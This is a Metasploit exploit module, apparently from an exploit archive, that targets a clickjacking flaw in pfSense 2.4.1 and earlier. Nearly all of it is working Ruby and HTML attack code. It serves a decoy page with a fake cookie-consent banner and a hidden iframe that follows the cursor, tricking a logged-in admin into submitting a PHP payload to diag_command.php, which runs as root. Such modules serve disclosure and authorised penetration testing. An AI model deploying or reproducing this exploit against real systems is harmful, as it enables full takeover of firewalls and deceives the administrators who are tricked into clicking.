pfSense 2.4.1 CSRF Error Page Clickjacking

This Metasploit module exploits a Clickjacking vulnerability in pfSense versions 2.4.1 and below. pfSense is a free and open source firewall and router. It was found that the pfSense WebGUI is vulnerable to Clickjacking. By tricking an authenticated admin into interacting with a specially crafted webpage it is possible for an attacker to execute arbitrary code in the WebGUI. Since the WebGUI runs as the root user, this will result in a full compromise of the pfSense instance.


MD5 | 88144d72abf1d2945664621d86be2cbc

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::Remote::HttpServer::HTML

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Clickjacking Vulnerability In CSRF Error Page pfSense',
'Description' => %q{
This module exploits a Clickjacking vulnerability in pfSense <= 2.4.1.

pfSense is a free and open source firewall and router. It was found that the
pfSense WebGUI is vulnerable to Clickjacking. By tricking an authenticated admin
into interacting with a specially crafted webpage it is possible for an attacker
to execute arbitrary code in the WebGUI. Since the WebGUI runs as the root user,
this will result in a full compromise of the pfSense instance.
},
'Author' => 'Yorick Koster',
'Payload' => { 'BadChars' => '"' },
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'https://securify.nl/en/advisory/SFY20171101/clickjacking-vulnerability-in-csrf-error-page-pfsense.html'],
['URL', 'https://doc.pfsense.org/index.php/2.4.2_New_Features_and_Changes']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process'
},
'Arch' => ARCH_PHP,
'Platform' => 'php',
'Targets' =>
[
[ 'pfSense <= 2.4.1', { 'auto' => false } ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Nov 21 2017'
)
)

register_options(
[
OptString.new('TARGETURI', [true, 'The base path to the web application', 'https://192.168.1.1'])
]
)
end

def js_file
@js ||= lambda {
path = File.join(Msf::Config.data_directory, 'exploits', 'pfsense_clickjacking', 'cookieconsent.min.js')
return File.read(path)
}.call
end

def css_file
@css ||= lambda {
path = File.join(Msf::Config.data_directory, 'exploits', 'pfsense_clickjacking', 'cookieconsent.min.css')
return File.read(path)
}.call
end

def background_file
@background ||= lambda {
path = File.join(Msf::Config.data_directory, 'exploits', 'pfsense_clickjacking', 'background.jpg')
return File.read(path)
}.call
end

def on_request_uri(cli, request)
print_status("GET #{request.uri} #{request.headers['User-Agent']}")

resp = create_response(200, "OK")
if request.uri =~ /\.js$/
resp.body = js_file
resp['Content-Type'] = 'text/javascript'

elsif request.uri =~ /\.css$/
resp.body = css_file
resp['Content-Type'] = 'text/css'

elsif request.uri =~ /\.jpg$/
resp.body = background_file
resp['Content-Type'] = 'image/jpg'

else
if datastore['TARGETURI'].end_with? '/'
url = datastore['TARGETURI'] + 'diag_command.php'
else
url = datastore['TARGETURI'] + '/diag_command.php'
end
framename = rand_text_alpha(16)
divname = rand_text_alpha(16)
resp.body = %Q|<!DOCTYPE html>
<html>
<meta charset="utf-8">
<link rel="stylesheet" type="text/css" href="#{get_resource.chomp('/')}/cookieconsent.min.css" />
<script src="#{get_resource.chomp('/')}/cookieconsent.min.js"></script>
<script>
window.addEventListener("load", function(){
window.cookieconsent.initialise({
"palette": {
"popup": {
"background": "#000",
"text": "#0f0"
},
"button": {
"background": "#0f0"
}
},
"position": "top",
"static": true
});
});
</script>
<script>
document.cookie = 'cookieconsent_status=; expires=Thu, 01 Jan 1970 00:00:01 GMT;';
window.addEventListener('load', function(){
document.forms[0].post.click();
document.onmousemove = function(e) {
var e = e \|\| window.event;
var s = document.getElementById('#{divname}');
s.style.left = (e.clientX - 10) + 'px';
s.style.top = (e.clientY - 5) + 'px';
};
});
</script>
<body style="background-image:url(#{get_resource.chomp('/')}/background.jpg);background-size:cover;">
<div id="#{divname}" style="position:absolute;z-index:10;border:none;width:20px;height:10px;overflow:hidden;opacity:0.0;">
<iframe src="about:blank" name="#{framename}" sandbox="allow-forms" border="no" scrolling="no" width="800" height="800" style="width:400px;height:800px;margin-top:-70px;margin-left:-40px;"></iframe>
</div>
<div style="display:none">
<form action="#{url}" method="POST" enctype="multipart/form-data" target="#{framename}">
<input type="hidden" name="txtPHPCommand" value="#{payload.encoded}" />
<input type="hidden" name="submit" value="EXECPHP" />
<input type="submit" name="post"/>
</form>
</div>
</body>
</html>
|
resp['Content-Type'] = 'text/html'
end

cli.send_response(resp)
end
end

Related Posts

Comments